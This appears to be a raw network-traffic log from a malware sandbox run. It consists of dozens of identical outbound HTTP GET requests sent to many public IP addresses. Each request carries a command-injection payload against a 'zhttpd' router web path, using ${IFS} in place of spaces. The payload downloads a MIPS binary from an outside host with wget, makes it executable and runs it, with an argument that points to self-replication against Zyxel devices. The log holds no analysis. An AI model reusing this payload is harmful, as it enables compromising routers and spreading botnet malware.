                                                      Feb 2, 2024 06:35:45.470284939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2587192.168.2.1445448111.69.162.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.470309019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2588192.168.2.1439326181.211.180.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.470360041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2589192.168.2.1434646211.12.85.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.470397949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2590192.168.2.144159483.98.214.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.470480919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2591192.168.2.145568266.235.252.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.470499992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2592192.168.2.1455128174.190.238.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.470532894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2593192.168.2.145096871.103.164.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.470581055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2594192.168.2.145844640.82.151.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.470618010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2595192.168.2.143616871.69.188.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.470669031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2596192.168.2.144873624.111.174.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.470702887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2597192.168.2.1442448201.228.28.188443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.470726967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2598192.168.2.1440952128.118.127.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.470796108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2599192.168.2.1434726218.56.164.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.470825911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2600192.168.2.1446580188.59.29.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.470884085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2601192.168.2.1444002160.104.119.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.470933914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2602192.168.2.145900619.115.143.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.470956087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2603192.168.2.145184825.178.11.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.471005917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2604192.168.2.1433452110.100.135.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.471048117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2605192.168.2.144755285.14.105.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.471132040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2606192.168.2.145283631.204.197.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.471134901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2607192.168.2.145872268.30.131.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.471155882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2608192.168.2.1449130102.152.152.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.471194029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2609192.168.2.143611496.117.7.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.471236944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2610192.168.2.143675258.5.162.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.471267939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2611192.168.2.146042213.119.156.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.471319914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2612192.168.2.1438474159.112.166.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.471359968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2613192.168.2.145258618.212.135.231443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.471395969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2614192.168.2.1459800151.233.123.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.471450090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2615192.168.2.1449672103.176.95.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.471483946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2616192.168.2.1453534198.60.98.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.471525908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2617192.168.2.1445722132.132.181.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.471573114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2618192.168.2.1447322212.96.219.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.471611023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2619192.168.2.14599881.220.165.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.471653938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2620192.168.2.1446036184.181.130.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.471689939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2621192.168.2.144863682.202.13.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.471735954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2622192.168.2.1437016211.190.141.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.471788883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2623192.168.2.1441372102.94.219.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.475524902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2624192.168.2.1443786185.153.105.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.475548983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2625192.168.2.1436832152.82.182.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.475589991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2626192.168.2.145388035.68.253.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.475639105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2627192.168.2.146092635.190.133.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.475682974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2628192.168.2.145773082.38.240.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.475720882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2629192.168.2.144749250.5.105.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.475765944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2630192.168.2.143636249.119.210.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.475804090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2631192.168.2.1454440202.115.0.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.475846052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2632192.168.2.143953468.211.246.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.475889921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2633192.168.2.1443414196.177.102.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.475923061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2634192.168.2.1434058211.212.191.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.484853983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2635192.168.2.143685885.56.164.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.484896898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2636192.168.2.143735252.159.38.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.484952927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2637192.168.2.1449474199.236.241.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.484983921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2638192.168.2.144301891.157.202.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.485013962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2639192.168.2.143637442.104.210.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.485066891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2640192.168.2.143721031.125.42.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.485112906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2641192.168.2.1455382199.40.128.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.485152006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2642192.168.2.14577048.52.252.47443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.485203981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2643192.168.2.1460212134.190.33.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.485244989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2644192.168.2.1458602129.124.36.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.485301971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2645192.168.2.1442276107.214.70.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.485332012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2646192.168.2.1453602108.101.236.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.485378981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2647192.168.2.143540683.250.212.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.485418081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2648192.168.2.1451656121.200.42.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.485444069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2649192.168.2.1445564162.239.254.51443
                                                      TimestampBytes transferredDirectionData
